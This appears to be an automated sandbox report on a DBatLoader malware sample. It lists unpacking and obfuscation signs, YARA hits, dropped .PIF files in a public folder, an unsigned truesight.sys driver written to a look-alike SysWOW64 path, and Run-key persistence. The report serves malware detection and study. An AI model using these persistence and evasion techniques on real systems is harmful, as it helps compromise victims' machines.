Source:	Binary string: easinvoker.pdb source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020B5D000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1840188323.000000002586F000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702911770.00000000218D2000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702911770.0000000021901000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020B5D000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825586433.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825586433.0000000000906000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000009.00000003.1905153099.0000000000748000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000009.00000003.1905153099.0000000000719000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 3.2.nhpoymuP.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 7.2.nhpoymuP.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 14.2.nhpoymuP.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 3.2.nhpoymuP.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 7.2.nhpoymuP.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 14.2.nhpoymuP.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.image.exe.2c90000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.image.exe.24066a8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.image.exe.24066a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1714114145.0000000002406000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1679035138.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: nhpoymuP.pif.0.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02CA8798 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CA8798

Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C932FC push eax; ret	0_2_02C93338
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CBC2FC push 02CBC367h; ret	0_2_02CBC35F
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C9635A push 02C963B7h; ret	0_2_02C963AF
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C9635C push 02C963B7h; ret	0_2_02C963AF
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CBC0AC push 02CBC125h; ret	0_2_02CBC11D
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CBC1F8 push 02CBC288h; ret	0_2_02CBC280
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CBC144 push 02CBC1ECh; ret	0_2_02CBC1E4
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA86B8 push 02CA86FAh; ret	0_2_02CA86F2
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C96738 push 02C9677Ah; ret	0_2_02C96772
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C96736 push 02C9677Ah; ret	0_2_02C96772
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C9C4EC push ecx; mov dword ptr [esp], edx	0_2_02C9C4F1
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CAE5AC push ecx; mov dword ptr [esp], edx	0_2_02CAE5B1
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C9D520 push 02C9D54Ch; ret	0_2_02C9D544
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C9CB6C push 02C9CCF2h; ret	0_2_02C9CCEA
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C9CB63 push 02C9CCF2h; ret	0_2_02C9CCEA
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CBBB64 push 02CBBD8Ch; ret	0_2_02CBBD84
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA68C8 push 02CA6973h; ret	0_2_02CA696B
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA68C6 push 02CA6973h; ret	0_2_02CA696B
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA788C push 02CA7909h; ret	0_2_02CA7901
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA890E push 02CA8948h; ret	0_2_02CA8940
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CAA918 push 02CAA950h; ret	0_2_02CAA948
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA8910 push 02CA8948h; ret	0_2_02CA8940
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CAA917 push 02CAA950h; ret	0_2_02CAA948
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA2EE0 push 02CA2F56h; ret	0_2_02CA2F4E
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA2FEB push 02CA3039h; ret	0_2_02CA3031
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA2FEC push 02CA3039h; ret	0_2_02CA3031
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA5DFC push ecx; mov dword ptr [esp], edx	0_2_02CA5DFE
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_0041C40C push cs; iretd	3_2_0041C4E2
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00423149 push eax; ret	3_2_00423179
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_0041C50E push cs; iretd	3_2_0041C4E2
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_004231C8 push eax; ret	3_2_00423179

Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\image.exe	File created: C:\Users\Public\Libraries\Pumyophn.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\image.exe	File created: C:\Users\Public\Libraries\nhpoymuP.pif			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\image.exe	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	File created: C:\Windows \SysWOW64\truesight.sys

Source: C:\Users\user\Desktop\image.exe	File created: C:\Users\Public\Libraries\Pumyophn.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\image.exe	File created: C:\Users\Public\Libraries\nhpoymuP.pif			Jump to dropped file

Source: C:\Users\user\Desktop\image.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Pumyophn			Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Pumyophn			Jump to behavior

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02CAA954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02CAA954

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
